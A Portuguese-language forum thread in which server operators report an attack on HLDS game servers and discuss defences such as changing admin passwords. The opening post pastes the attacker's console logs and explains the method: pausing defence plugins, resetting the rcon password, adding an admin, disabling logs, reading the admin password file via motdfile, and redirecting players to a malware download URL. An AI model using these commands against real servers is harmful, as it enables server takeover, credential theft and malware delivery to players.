•  
     

Falha de segurança no HLDS - Um invasor poder ter acesso a lista de todos admins

HDLS tem uma falha que permite um cara ver a senha de todos os admins e modificar arquivos


Logs do ataque:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname -redacted-
hostname -redacted-
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url="URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0




amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
hostname "Hacked by http://URL DO SITE DELE"
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0


amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=http://IPdoVIRUS/csupdate.exe">
log off
mp_logfile 0



amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password spankylovesyou
rcon hostname URL DO SITE DELE
hostname URL DO SITE DELE
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url=http://URL DO SITE VIRUS">




COM_WriteFile: addons/metamod/exec.cfg

Ignoring non-customization file upload of addons\metamod\exec.cfg

COM_WriteFile: addons/amxmodx/configs/maps/31hp_knife_pro.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\31hp_knife_pro.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp_alone.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp_alone.cfg

COM_WriteFile: addons/amxmodx/configs/maps/hnsm_nemesis.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\hnsm_nemesis.cfg

COM_WriteFile: addons/amxmodx/configs/maps/as_oilrig.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\as_oilrig.cfg

Can't download addons\amxmodx\configs\maps\awp_bycastor32.cfg, already exists

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_bycastor32.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_india.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_india.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_mie.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_mie.cfg

COM_WriteFile: addons/amxmodx/configs/maps/c21_kitty_b1.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\c21_kitty_b1.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooft0ps_remake.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooftops.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooftops.cfg
 
O invasor primeiro pausa os plugins de defesa e depois usa isso:

Usa o comando:


Código: Selecionar todos

amx_rcon rcon_password senha

ou

Código: Selecionar todos

amx_cvar rcon_password senha


Depois usa:

Código: Selecionar todos

rcon_password "senha que ele colocou no server"


Para pegar as senhas de todos admins ele usa:

Código: Selecionar todos


rcon motdfile addons/amxmodx/configs/users.ini
reconnect




Para colocar o site dele ou uma url de um vírus no motd.txt, ele usa:

Código: Selecionar todos

motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://IP DO VIRUS/csupdate.exe">



Para ver as configs do arquivo server.cfg ele usa:

Código: Selecionar todos

rcon motdfile server.cfg 
reconnect
 
o que vc recomenda que os Master Façam ??
 
Mas os servers continuam vulneráveis ou vc já Solucionou Anderson ?

E Agora , quem poderá nos Defender ?
 
    '-Xuuuh~' Escreveu:Mas os servers continuam vulneráveis ou vc já Solucionou Anderson ?

    E Agora , quem poderá nos Defender ?
É só fazer o que o Anderson falou, mudar todas as senhas dos admin's, e colocar
"STEAM_ID com senha"
 
The_MorFeU Escreveu:
    '-Xuuuh~' Escreveu:Mas os servers continuam vulneráveis ou vc já Solucionou Anderson ?

    E Agora , quem poderá nos Defender ?
É só fazer o que o Anderson falou, mudar todas as senhas dos admin's, e colocar
"STEAM_ID com senha"


Sim , mas não adianta mudar a senha se os servers continuam vulneráveis a invasão.
O cara vai invadir sempre e pegar as senhas sempre.

Por isso perguntei ai EMÃO :)

Essa parada de mudar a senha de todos admins foi a solução inicial , mas tem que reparar o HLDS para não sofrer mais invasões.
 
'-Xuuuh~' Escreveu:
The_MorFeU Escreveu:
    '-Xuuuh~' Escreveu:Mas os servers continuam vulneráveis ou vc já Solucionou Anderson ?

    E Agora , quem poderá nos Defender ?
É só fazer o que o Anderson falou, mudar todas as senhas dos admin's, e colocar
"STEAM_ID com senha"


Sim , mas não adianta mudar a senha se os servers continuam vulneráveis a invasão.
O cara vai invadir sempre e pegar as senhas sempre.

Por isso perguntei ai EMÃO :)

Essa parada de mudar a senha de todos admins foi a solução inicial , mas tem que reparar o HLDS para não sofrer mais invasões.

Só se ele atualiza-los, mas acho que ele não vai fazer isso, se atualizar creio que muda as configs.